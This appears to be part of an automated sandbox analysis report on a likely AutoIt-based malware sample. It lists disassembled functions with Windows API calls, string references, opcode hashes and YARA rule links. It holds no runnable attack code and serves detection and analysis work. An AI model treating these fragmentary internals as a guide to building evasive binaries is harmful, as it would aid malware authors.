API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 80527df429f4ede8356594e117d110dc42096a9a3cfd867c4892b37a6a1ccfcb
Instruction ID: e287414ad19ae5ba7fdc4e99b2eda01509fdc55393200b8c4bf33d95961eb206
Opcode Fuzzy Hash: 80527df429f4ede8356594e117d110dc42096a9a3cfd867c4892b37a6a1ccfcb
Instruction Fuzzy Hash: 21110670521236FADB24CF91AC89EFBFBACFF05351F1042AAF54556000D2B569A8C6F0

Function 001C0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001B3C26,002752F8,?,?,?), ref: 001C0ACE

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

_wcscat.LIBCMT ref: 001F5010

Strings

S', xrefs: 001C0B0E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S'
API String ID: 257928180-3501010784
Opcode ID: 32adeeef09e93f41528a4f7a2dc3af230affe6f359716aba8f43729d88dfe537
Instruction ID: 28999966c671ffff7736ab2a0fe5faee53fe8369827ab8a8d78b4e3c53d37bb0
Opcode Fuzzy Hash: 32adeeef09e93f41528a4f7a2dc3af230affe6f359716aba8f43729d88dfe537
Instruction Fuzzy Hash: 721182349042189A8B41EBA4DD01FD9B3B8EF28390B0040A9B94CD7291DBB0DA848B50

Function 00208FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

Part of subcall function 0020AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0020AEC7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0020902D

Strings

ListBox, xrefs: 00208FF7
ComboBox, xrefs: 00208FCC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 96f2c22e8ac8c73d40222e5e81b007f1a6722c9f619b97835c21b8bb7b15405c
Instruction ID: b2fd4bac9e7bcf64c23679f7af488ec21140aaa3aa468a7282adac8507616bc1
Opcode Fuzzy Hash: 96f2c22e8ac8c73d40222e5e81b007f1a6722c9f619b97835c21b8bb7b15405c
Instruction Fuzzy Hash: CD01DF71A65309ABCB14EBA0C996EFE73ADDF55340F140029B812632C3DB656E2896B1

Function 0020C7AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0020C7F6

Part of subcall function 0020CB06: _memmove.LIBCMT ref: 0020CB50
Part of subcall function 0020CB06: VariantInit.OLEAUT32(00000000), ref: 0020CB72
Part of subcall function 0020CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0020CB7C

VariantClear.OLEAUT32(?), ref: 0020C818

Strings

d}&, xrefs: 0020C7D9

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}&
API String ID: 2932060187-4160960680
Opcode ID: d1d8a9fe78beac4762376e936792dbec519fad854ab2c33e39688332d87d7241
Instruction ID: e5d473d423384e934338bcb27a3a8fed8eb16e95b74234081123ae50abbad79e
Opcode Fuzzy Hash: d1d8a9fe78beac4762376e936792dbec519fad854ab2c33e39688332d87d7241
Instruction Fuzzy Hash: A61152B18007089FC710DFA5D8848DAF7F8FF18314B50862EE64AD7611E730A949CF90

Function 02A760EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 02A76110
__calloc_crt.LIBCMT ref: 02A76129

Strings

K, xrefs: 02A7614E

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __calloc_crt
String ID: K
API String ID: 3494438863-4153964727
Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction ID: c2cba9140de2d3aa77cd68d7e1adc1c6f307e9531f879f12acf1a3d6f21eb948
Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction Fuzzy Hash: 11F0AF71A88F128BFB648F29BD44BA9A7DAE740B20F004077E115CF192EB3494858E9C

Function 02A790F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 02A79114

Part of subcall function 02A7918B: __mtinitlocknum.LIBCMT ref: 02A7919D

__updatetlocinfoEx_nolock.LIBCMT ref: 02A79124

Part of subcall function 02A78680: ___addlocaleref.LIBCMT ref: 02A7869C
Part of subcall function 02A78680: ___removelocaleref.LIBCMT ref: 02A786A7
Part of subcall function 02A78680: ___freetlocinfo.LIBCMT ref: 02A786BB

Strings

8K, xrefs: 02A79105

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: Ex_nolock___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8K
API String ID: 3369060592-2802361588
Opcode ID: d41c92ecd1d7e74e0adb9f475a826e210c9bd16fdcadbad4fdccb8f20f9f3334
Instruction ID: 1ed1f8b0c3a5268e45a876d00f27572a6ed82dc3cb74f4fe5c2b1f44e46b3948
Opcode Fuzzy Hash: d41c92ecd1d7e74e0adb9f475a826e210c9bd16fdcadbad4fdccb8f20f9f3334
Instruction Fuzzy Hash: 8CE0CD316C7301FAD654F7A59E077CEB6515B80732F30035BD005550C0CE7814448D6F

Analysis Process: name.exePID: 3328, Parent PID: 3260COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	0.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 012C449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0129E6F1), ref: 012C44AB
FindFirstFileW.KERNEL32(?,?), ref: 012C44BC
FindClose.KERNEL32(00000000), ref: 012C44CC

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: b6e479014c14b535fd6eabbdd72033b464641e27b15cdcf3ea9f3adc24047004
Instruction ID: 797fa61cabb14159bb11aacdd622bff3d6caaf3c406826d914aee8aa3a2d34d1
Opcode Fuzzy Hash: b6e479014c14b535fd6eabbdd72033b464641e27b15cdcf3ea9f3adc24047004
Instruction Fuzzy Hash: 69E0D831820941574330B638FC0D4EAB79CEF05235F104709FA35C10C4E77459108695

Function 01270B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01270BBB
timeGetTime.WINMM ref: 01270E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01270FB3
Sleep.KERNEL32(0000000A), ref: 01270FC1
LockWindowUpdate.USER32(00000000), ref: 0127105A
DestroyWindow.USER32 ref: 01271066
GetMessageW.USER32 ref: 01271080
Sleep.KERNEL32(0000000A,?,?), ref: 012A51DC
TranslateMessage.USER32(?), ref: 012A5FB9
DispatchMessageW.USER32(?), ref: 012A5FC7
GetMessageW.USER32 ref: 012A5FDB

Strings

@COM_EVENTOBJ, xrefs: 012A5849
@GUI_CTRLID, xrefs: 012A5293
@GUI_CTRLHANDLE, xrefs: 012A533D
@GUI_WINHANDLE, xrefs: 012A52E8
@TRAY_ID, xrefs: 012A5AE8

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 35972f068baef6bcfc3e14dc0401b55aef58ef6e8b2c35cd19523c49c5f465e6
Instruction ID: a0b72360894aa1d4c4de7187a8e6d186bc0068067e413e8b904c067cfe980468
Opcode Fuzzy Hash: 35972f068baef6bcfc3e14dc0401b55aef58ef6e8b2c35cd19523c49c5f465e6
Instruction Fuzzy Hash: 96B2C070628342DFD724DF28C494BAFBBE5BF85304F54491DE69987291DB70E988CB82

Function 0126410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0129D51C

Part of subcall function 01267D2C: _memmove.LIBCMT ref: 01267D66

_memset.LIBCMT ref: 0126418D
_wcscpy.LIBCMT ref: 012641E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 012641F1

Strings

Line: , xrefs: 0129D545

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: f1e90bc5c10f4404e5a68e78cb60ba0ead762bc82c6ec962578a22e2cfdd3dea
Instruction ID: a1878fc0fadff4a83c4cb908c6e2542c5f88526466237814591bfd909b8df240
Opcode Fuzzy Hash: f1e90bc5c10f4404e5a68e78cb60ba0ead762bc82c6ec962578a22e2cfdd3dea
Instruction Fuzzy Hash: EF31CF31528346AAD731FB64E844FEB77ECAF64304F10451EF694921D4EB70A688C792

Function 012669CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01264F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,013252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 01264F6F

_free.LIBCMT ref: 0129E5BC
_free.LIBCMT ref: 0129E603

Part of subcall function 01266BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 01266D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0129E392
Bad directive syntax error, xrefs: 0129E5EB

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 949ebdea5b0f1d72084d29c0b4c830745ecbc965c99ebd0d1f3fd0f79deec209
Instruction ID: 459cf390f9efe96b6526cfdd97ac0300bb017832a2eabee556c792ab6d29529b
Opcode Fuzzy Hash: 949ebdea5b0f1d72084d29c0b4c830745ecbc965c99ebd0d1f3fd0f79deec209
Instruction Fuzzy Hash: A5914F7193021AAFCF14EFA8DC909FDB7B8FF18314F054469E915AB2A0EB70A955CB50

Function 0128487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 01284910
__flush.LIBCMT ref: 01284930
__write.LIBCMT ref: 01284963
__flsbuf.LIBCMT ref: 01284991

Part of subcall function 01288CA8: __getptd_noexit.LIBCMT ref: 01288CA8

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction ID: c090c84319fd266167e8b46f0f312dc87968912284bf539ec4c07e75ab6f4d5a
Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction Fuzzy Hash: 5F41F9316367879BEB28FE6DC880B6E7BA6AF54360B14853DEA55C76C0E670D940CB40

Function 012643DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01264401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 012644A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 012644C3

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 8b2d9a73db5baf56d6fb45d49e8d266986a06ee1e4e13da2bb1b26a725123452
Instruction ID: b002ccac4609d71ddc1045089ffc66c5300e19342ebdbea24415f17c0c6e285d
Opcode Fuzzy Hash: 8b2d9a73db5baf56d6fb45d49e8d266986a06ee1e4e13da2bb1b26a725123452
Instruction Fuzzy Hash: AF317F705143428FD731EF64D4856ABBBE8FB49308F00092EE6DA87281D771A684CB92

Function 0126AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0129FF5A

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 5967aefeace33b0ed7842085c8e333ed2d65efdb3ef7325ca07cab9e29b9e7eb
Instruction ID: 262f121de257753c6052a217f6b035f1eb8d71ceb94f9bbdee59ce1f965d0aad
Opcode Fuzzy Hash: 5967aefeace33b0ed7842085c8e333ed2d65efdb3ef7325ca07cab9e29b9e7eb
Instruction Fuzzy Hash: A6225C70628342CFDB24DF18C494B2ABBE5FF94304F14895DE9969B3A1D771E885CB82

Function 0126492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 01264992

Part of subcall function 012834EC: __lock.LIBCMT ref: 012834F2
Part of subcall function 012834EC: DecodePointer.KERNEL32(00000001,?,012649A7,012B7F9C), ref: 012834FE
Part of subcall function 012834EC: EncodePointer.KERNEL32(?,?,012649A7,012B7F9C), ref: 01283509

Part of subcall function 01264A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,009CA430,?,012649BA), ref: 01264A73
Part of subcall function 01264A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,009CA430,?,012649BA), ref: 01264A88

Part of subcall function 01263B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01263B7A
Part of subcall function 01263B4C: IsDebuggerPresent.KERNEL32 ref: 01263B8C
Part of subcall function 01263B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,013252F8,013252E0,?,?), ref: 01263BFD
Part of subcall function 01263B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 01263C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 012649D2

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: eb23d11bbb7be5112afa33ab807872390f492cb97e4b13f8697701978d02cc75
Instruction ID: cf0f15296ff09906be20dccd735d194c9227204f0ac939a97cffef996eed643a
Opcode Fuzzy Hash: eb23d11bbb7be5112afa33ab807872390f492cb97e4b13f8697701978d02cc75
Instruction Fuzzy Hash: 6B118E718243129FC720EF29E84595ABBECFF95710F10451EF485972E0DB709A84CB91

Function 012681C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0126558F,?,?,?,?,?), ref: 012681DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0126558F,?,?,?,?,?), ref: 0126820D

Part of subcall function 012678AD: _memmove.LIBCMT ref: 012678E9

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 252ee3319a4d85e3c209b16d34ff45f8f13b3780b51a4beff575784a35d101d0
Instruction ID: dd140892eb519788f0442e518567294b3dfd7bd46ee8374fbb3508e89a7d65bf
Opcode Fuzzy Hash: 252ee3319a4d85e3c209b16d34ff45f8f13b3780b51a4beff575784a35d101d0
Instruction Fuzzy Hash: A701AD312112057FEB246A25ED8AF7B7FACEB9A360F10802AFD05CD1D0DA30D840C6B1

Function 01272123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fba38e73cc786df114052526a585a10709a65af2730713f79c8937b60f13ca4
Instruction ID: faa99eaf47bde3d84e72810e74dac6dca99c6a1fa654ed287e440fd35eae8758
Opcode Fuzzy Hash: 2fba38e73cc786df114052526a585a10709a65af2730713f79c8937b60f13ca4
Instruction Fuzzy Hash: 6F51B234620206EFDF14EF58C990EBE77AAAF55310F188068EA46AB3D1CB30ED45CB54

Function 012A0005 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 012A0010

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 75d140205a4235c6eb2aef840014add38c5d91a755f9e4dbeb78bd4062a0867a
Instruction ID: f7d1e5e8a867fd649c48aa575a0727d8b2c3f64a2e3c838d59e59344786b9629
Opcode Fuzzy Hash: 75d140205a4235c6eb2aef840014add38c5d91a755f9e4dbeb78bd4062a0867a
Instruction Fuzzy Hash: 4C414C74514342CFDB15DF18C484B1ABBE0BF45318F0988ACEA959B3A2C732E885CF56

Function 012A00DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 012A00EA

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a8b9570fc418ae26b9cdc47f7d10d66b81e2acb4b55e9ba7fd3597fbd48e00d0
Instruction ID: 1c654fe9a5f2c7e92c688225a7b9a839e999559784bbdc36daa9de4b77045042
Opcode Fuzzy Hash: a8b9570fc418ae26b9cdc47f7d10d66b81e2acb4b55e9ba7fd3597fbd48e00d0
Instruction Fuzzy Hash: C4215570528342CFDB14DF14C844B1ABBE4BF88314F04886CFA96577A1D731E859CB92

Function 012849D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 01284A16

Part of subcall function 01288CA8: __getptd_noexit.LIBCMT ref: 01288CA8

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
